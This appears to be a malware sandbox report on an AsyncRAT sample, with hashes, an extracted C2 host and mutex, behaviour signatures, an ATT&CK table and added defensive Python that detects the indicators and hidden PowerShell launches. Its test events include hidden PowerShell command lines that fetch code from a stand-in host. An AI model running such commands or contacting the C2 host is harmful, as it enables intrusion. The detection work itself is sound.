General

  • Target

    Files.7z

  • Size

    176KB

  • Sample

    240605-qhxcsagd6s

  • MD5

    c03d1ca217a28c7d6ee5f6828bec9375

  • SHA1

    e8ef1d3c41033c98c11df4757868fd3d1fc283fe

  • SHA256

    54d46fbfeb589b2847878580392ae4aff98a0c59b0731541e311f5718023688d

  • SHA512

    ce9ac7b28855b44c365229f02814551b905360edef15d3641cf0c620c6559582ef98de356152de5691054eb2c455f08e94d44e3e1245e21304b325447f326971

  • SSDEEP

    3072:Nb+fzE3mwp4kSaBAEby28sLrKdenwWNBZ0gA3G4vg2Oa2iJ0:NaQ3msDy28sLede3CRvwa2iJ0

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

RFU

C2

new22.vpndns.net:116

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
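
The configuration above gives the indicators a responder would pivot on: the C2 host and port, and the mutex name. The following Python is an added example, not part of this report or of the AsyncRAT tooling. It types the extracted fields, parses the C2 value (the comma-separated multi-host form is accepted on the assumption that the AsyncRAT builder allows several hosts in that field; this report shows one), and runs the indicators over constructed Zeek-style dns.log and conn.log lines and a constructed endpoint mutex listing. The log lines, the 10.0.0.x/203.0.113.x addresses and the process name dropped.exe are made up for the example and are not from the sandbox run.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class AsyncRatConfig:
    """The fields of the Malware Config section, typed."""
    family: str
    version: str
    botnet: str
    c2: tuple          # ((host, port), ...)
    mutex: str
    delay: int
    install: bool
    install_folder: str


def parse_c2(value: str) -> tuple:
    """Parse a 'host:port' C2 field into (host, port) pairs.

    This report shows one entry; a comma-separated list is accepted too
    (assumption: the AsyncRAT builder allows several hosts in that field).
    """
    out = []
    for part in value.split(","):
        part = part.strip()
        if not part:
            continue
        host, sep, port = part.rpartition(":")
        if not sep or not host or not port.isdigit():
            raise ValueError(f"malformed C2 entry: {part!r}")
        out.append((host.lower(), int(port)))
    return tuple(out)


# Indicators taken from the Malware Config section of this report.
CONFIG = AsyncRatConfig(
    family="asyncrat",
    version="| Edit 3LOSH RAT",
    botnet="RFU",
    c2=parse_c2("new22.vpndns.net:116"),
    mutex="AsyncMutex_6SI8OkPnk",
    delay=3,
    install=False,
    install_folder="%AppData%",
)

# Constructed inputs (not from the sandbox run): Zeek-style dns.log and
# conn.log lines (ts, uid, src, sport, dst, dport, ...) and an endpoint
# agent's listing of named mutexes per process.
DNS_LOG = (
    "1717580000.1\tC1\t10.0.0.5\t53214\t10.0.0.2\t53\tnew22.vpndns.net\tA\t203.0.113.7\n"
    "1717580001.2\tC2\t10.0.0.5\t53215\t10.0.0.2\t53\tupdate.example.com\tA\t198.51.100.3\n"
)
CONN_LOG = (
    "1717580002.3\tC3\t10.0.0.5\t49812\t203.0.113.7\t116\ttcp\n"
    "1717580003.4\tC4\t10.0.0.5\t49813\t198.51.100.3\t443\ttcp\n"
    "1717580004.5\tC5\t10.0.0.6\t49814\t192.0.2.9\t116\ttcp\n"   # port 116 to an unrelated host
)
MUTEX_LIST = (
    "pid=1234 name=explorer.exe mutex=\\Sessions\\1\\BaseNamedObjects\\SM0:1234:168:WilStaging_02\n"
    "pid=4567 name=dropped.exe mutex=\\Sessions\\1\\BaseNamedObjects\\AsyncMutex_6SI8OkPnk\n"
)


def match_dns(log: str, cfg: AsyncRatConfig) -> list:
    """Return (uid, query, answer) for lookups of any configured C2 host."""
    hosts = {h for h, _ in cfg.c2}
    hits = []
    for line in log.splitlines():
        f = line.split("\t")
        if len(f) >= 9 and f[6].lower() in hosts:
            hits.append((f[1], f[6], f[8]))
    return hits


def match_conn(log: str, cfg: AsyncRatConfig, resolved: dict) -> list:
    """Return uids of connections to a resolved C2 address on its port.

    `resolved` maps C2 hostname -> IP learned from match_dns, so the pivot
    from DNS answer to connection is explicit; port 116 alone would be noisy.
    """
    targets = {(resolved[h], p) for h, p in cfg.c2 if h in resolved}
    hits = []
    for line in log.splitlines():
        f = line.split("\t")
        if len(f) >= 7 and (f[4], int(f[5])) in targets:
            hits.append(f[1])
    return hits


MUTEX_RE = re.compile(r"pid=(\d+) name=(\S+) mutex=(\S+)")


def match_mutex(listing: str, cfg: AsyncRatConfig) -> list:
    """Return (pid, process) holding the configured mutex. Only the final
    path component is compared; the BaseNamedObjects prefix varies per session."""
    hits = []
    for line in listing.splitlines():
        m = MUTEX_RE.match(line)
        if m and m.group(3).rsplit("\\", 1)[-1] == cfg.mutex:
            hits.append((int(m.group(1)), m.group(2)))
    return hits


def triage(dns_log=DNS_LOG, conn_log=CONN_LOG, mutex_list=MUTEX_LIST, cfg=CONFIG) -> dict:
    """Run all three checks and return the hits per data source."""
    dns_hits = match_dns(dns_log, cfg)
    resolved = {query: answer for _, query, answer in dns_hits}
    return {
        "dns": dns_hits,
        "conn": match_conn(conn_log, cfg, resolved),
        "mutex": match_mutex(mutex_list, cfg),
    }


if __name__ == "__main__":
    for source, hits in triage().items():
        print(f"{source}: {hits}")
```

The conn.log check deliberately requires the destination address to have come from a DNS answer for the C2 name; the third constructed connection, to a different host on port 116, is not reported. The mutex name is the more durable of the two indicators on a host, since the C2 hostname can be rotated without rebuilding the client.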

Targets

    • Target

      Files.7z

    • Size

      176KB

    • MD5

      c03d1ca217a28c7d6ee5f6828bec9375

    • SHA1

      e8ef1d3c41033c98c11df4757868fd3d1fc283fe

    • SHA256

      54d46fbfeb589b2847878580392ae4aff98a0c59b0731541e311f5718023688d

    • SHA512

      ce9ac7b28855b44c365229f02814551b905360edef15d3641cf0c620c6559582ef98de356152de5691054eb2c455f08e94d44e3e1245e21304b325447f326971

    • SSDEEP

      3072:Nb+fzE3mwp4kSaBAEby28sLrKdenwWNBZ0gA3G4vg2Oa2iJ0:NaQ3msDy28sLede3CRvwa2iJ0

    • AsyncRat

      AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

    • Async RAT payload

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with the display window hidden.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely for geofencing.

    • Executes dropped EXE

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials and other sensitive information.
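
The "Command and Scripting Interpreter: PowerShell" signature fires on PowerShell started with its window hidden. The following Python is an added example, not part of this report, of the same check run over process-creation events; the Sysmon-style event lines are constructed for the example, not taken from the sandbox run. It handles two things a plain substring match for "-WindowStyle Hidden" misses: powershell.exe accepts any unambiguous prefix of a parameter name, so the flag also appears as -w h or -win hidden, and the flag can sit inside an -EncodedCommand payload (base64 of UTF-16LE) rather than on the outer command line.

```python
import base64
import re
from typing import Optional

# powershell.exe accepts any unambiguous prefix of a parameter name, so
# -WindowStyle shows up as -w, -win, -windowst ... in real command lines, and
# the value Hidden is abbreviated the same way (h, hid, hidden). The prefixes
# are enumerated explicitly instead of matched with a loose wildcard.
_WS = r"w(?:i|in|ind|indo|indow|indows|indowst|indowsty|indowstyl|indowstyle)?"
_HID = r"h(?:i|id|idd|idde|idden)?"
HIDDEN_WINDOW = re.compile(rf"(?:^|\s)[-/]{_WS}\s+{_HID}(?=\s|$)", re.IGNORECASE)

# -EncodedCommand and its prefixes (-e, -ec, -enc, ...) followed by base64.
# "-ep" / "-ex" (ExecutionPolicy) do not match because whitespace must follow.
_ENC = r"e(?:c|n|nc|nco|ncod|ncode|ncoded|ncodedc|ncodedco|ncodedcom|ncodedcomm|ncodedcomma|ncodedcomman|ncodedcommand)?"
ENCODED = re.compile(rf"(?:^|\s)[-/]{_ENC}\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

POWERSHELL = re.compile(r"(?:^|[\\/\s\"])(?:powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)
EVENT_RE = re.compile(r'Image=(\S+) CommandLine="(.*)"$')


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def hidden_window_reason(cmdline: str) -> Optional[str]:
    """Explain why a PowerShell command line hides its window, or return None."""
    if HIDDEN_WINDOW.search(cmdline):
        return "hidden window flag on command line"
    script = decode_encoded_command(cmdline)
    if script and HIDDEN_WINDOW.search(script):
        return "hidden window flag inside -EncodedCommand payload"
    return None


def scan_events(events) -> list:
    """Return (index, image, reason) for events whose command line launches
    PowerShell with a hidden window, directly or via a parent such as cmd.exe."""
    hits = []
    for i, ev in enumerate(events):
        m = EVENT_RE.search(ev)
        if not m:
            continue
        image, cmdline = m.groups()
        if not POWERSHELL.search(cmdline):
            continue
        reason = hidden_window_reason(cmdline)
        if reason:
            hits.append((i, image, reason))
    return hits


# Constructed Sysmon-style process-creation events (not from the sandbox run).
_ENC_SCRIPT = "Start-Process notepad.exe -WindowStyle Hidden"
_B64 = base64.b64encode(_ENC_SCRIPT.encode("utf-16-le")).decode()
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [
    f'Image={_PS} CommandLine="powershell.exe -w hidden -ep bypass -File C:\\Users\\u\\AppData\\Roaming\\run.ps1"',
    'Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd /c powershell -WindowStyle Hidden -c iwr http://example.invalid/x"',
    f'Image={_PS} CommandLine="powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-Process"',
    f'Image={_PS} CommandLine="powershell -nop -enc {_B64}"',
    'Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe -w hidden.txt"',
]

if __name__ == "__main__":
    for idx, image, reason in scan_events(EVENTS):
        print(f"event {idx}: {image}: {reason}")
```

Of the five constructed events, the first, second and fourth are reported; the third is ordinary PowerShell use and the fifth is not PowerShell at all. A cmd.exe parent launching PowerShell hidden is caught because the check runs on the command line rather than on the image name alone.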

MITRE ATT&CK Matrix (ATT&CK v13)

  Tactic             Technique                            ID         Count
  Execution          Command and Scripting Interpreter    T1059      1
                       PowerShell                         T1059.001  1
  Credential Access  Unsecured Credentials                T1552      1
                       Credentials In Files               T1552.001  1
  Discovery          Query Registry                       T1012      1
                     System Information Discovery         T1082      2
  Collection         Data from Local System               T1005      1

Tasks